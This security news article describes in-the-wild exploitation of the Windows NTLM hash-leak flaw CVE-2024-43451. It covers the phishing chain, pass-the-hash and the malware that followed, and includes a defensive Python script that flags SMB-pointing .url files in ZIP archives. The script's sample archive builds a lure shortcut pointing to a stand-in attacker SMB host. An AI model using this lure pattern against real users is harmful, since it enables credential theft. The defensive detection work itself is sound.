How a Windows zero-day was exploited in the wild for months (CVE-2024-43451)
CVE-2024-43451, a Windows zero-day vulnerability for which Microsoft released a fix on the November 2024 Patch Tuesday, has been exploited since at least April 2024, ClearSky researchers have revealed.
About the vulnerability
CVE-2024-43451 affects all supported Windows versions and, when triggered, discloses a user’s NTLMv2 hash to the attacker, who can then either use it in pass-the-hash attacks or attempt to recover the user’s password from the hash.
In both cases the result is the same: the attacker can authenticate to the target system as the user.
CVE-2024-43451 exploited
ClearSky researchers, with the help of the Ukrainian CERT (CERT-UA), have pieced together the attack, which happened in June 2024.
The (suspected Russian) attacker compromised a Ukrainian academic server to be able to send out credible spear-phishing emails to very specific targets. The email asked the recipient to renew their academic certificate through an attached link.
When the victim clicks, a ZIP file is downloaded containing two files: a decoy PDF file with a graduation diploma, and a URL (Internet Shortcut) file that refers to an external server over the SMB protocol.
Right-clicking the file, or attempting to delete it or drag it to another folder, triggers the exploitation of CVE-2024-43451. The user’s NTLMv2 hash is delivered to the attacker and used to carry out a pass-the-hash attack and establish a connection to the attacker’s server.
Finally, when an EXE file posing as the certificate is downloaded from the server and executed, it shows a decoy message stating that the certificate has been activated and, in the background, it drops additional files that lead to the installation and execution of the SparkRAT malware.
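As an added defender-side example (not code from ClearSky or from the report), the following triage script inspects a ZIP attachment in memory for Internet Shortcut (.url) files whose fields point at a remote SMB/UNC host, the lure structure described above. Because the report says the exploit is triggered by right-clicking, deleting or dragging the shortcut, the archive is parsed in memory and nothing is written to disk. The function names, the sample archive built by build_sample_zip(), and the 203.0.113.5 address are constructed for illustration.

```python
"""Triage check: flag .url files inside a ZIP that reference a remote SMB/UNC host.

Added example for illustration; parses the archive in memory and never
extracts the shortcut to a folder, since filesystem interaction with the
shortcut is what triggers CVE-2024-43451.
"""
import configparser
import io
import re
import zipfile
from urllib.parse import urlparse

# UNC path of the form \\host\share\... (captures the host part).
UNC_RE = re.compile(r"^\\\\([^\\\s]+)\\")
LOOPBACK = {"localhost", "127.0.0.1", "::1"}


def remote_host_in_value(value):
    """Return the remote host a shortcut field points to, or None if it is not SMB/UNC."""
    v = value.strip().strip('"')
    m = UNC_RE.match(v)
    if m:
        host = m.group(1)
    else:
        try:
            parsed = urlparse(v)
        except ValueError:
            return None
        # file:// and smb:// URLs with a host are resolved over SMB by Windows.
        if parsed.scheme.lower() not in ("file", "smb"):
            return None
        host = parsed.hostname or ""
    host = host.lower()
    if not host or host in LOOPBACK:
        return None
    return host


def scan_url_file(name, data):
    """Parse one .url file (INI format) and list fields referencing a remote host."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    text = data.decode("utf-8-sig", errors="replace").replace("\r\n", "\n")
    try:
        parser.read_string(text)
    except configparser.Error:
        # Malformed shortcut: still worth a look, so report it as unparseable.
        return [(name, "<unparseable>", None)]
    findings = []
    for section in parser.sections():
        for key, value in parser.items(section):
            host = remote_host_in_value(value)
            if host:
                findings.append((name, f"{section}/{key}", host))
    return findings


def scan_zip_bytes(blob):
    """Inspect every .url member of a ZIP held in memory; returns (member, field, host) tuples."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if info.filename.lower().endswith(".url"):
                findings.extend(scan_url_file(info.filename, zf.read(info)))
    return findings


def build_sample_zip():
    """Constructed sample archive mimicking the lure: decoy PDF plus a shortcut to an SMB host."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("diploma.pdf", b"%PDF-1.4 constructed decoy, not a real document")
        zf.writestr(
            "certificate.url",
            "[InternetShortcut]\r\nURL=file://203.0.113.5/share/certificate.exe\r\n",
        )
        # A benign shortcut to an HTTPS site should not be flagged.
        zf.writestr("readme.url", "[InternetShortcut]\r\nURL=https://example.com/help\r\n")
    return buf.getvalue()


if __name__ == "__main__":
    for member, field, host in scan_zip_bytes(build_sample_zip()):
        print(f"FLAG {member}: {field} -> {host}")
```

The check is deliberately broad: any field of the shortcut that names a remote host is reported, so the script does not depend on which field an attacker happens to use. Run it against quarantined attachments on a non-Windows analysis host or inside mail-gateway tooling; a hit is a reason to block the message and look for outbound SMB connections from the recipient's workstation, not a reason to open the archive.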
Other attacks exploiting the flaw?
An analysis of the URL file has revealed similarly structured files that have been submitted to VirusTotal since early April:
Other similarly structured URL files exploiting CVE-2024-43451 (Source: ClearSky)
The names of those files point to the vulnerability having been exploited in similar attack scenarios to target other organizations with the Redline infostealer.
The similarity has two possible explanations, the researchers said: either a single attacker used different types of malware, or two different threat actors exploited the same vulnerability.
What to do?
ClearSky researchers have explained how a file that exploits CVE-2024-43451 can be created, and have noted that the vulnerability is more exploitable on Windows 10/11 operating systems than on older ones.
“On Windows 7, 8, and 8.1, the file did not initiate communication when dragged or deleted, unless the target folder was open at the time of dragging (this did not happen on the first attempt but was observed only after 2-3 attempts),” they found.
Microsoft has released a patch for CVE-2024-43451 and has advised Windows and Windows Server users to apply it as soon as possible.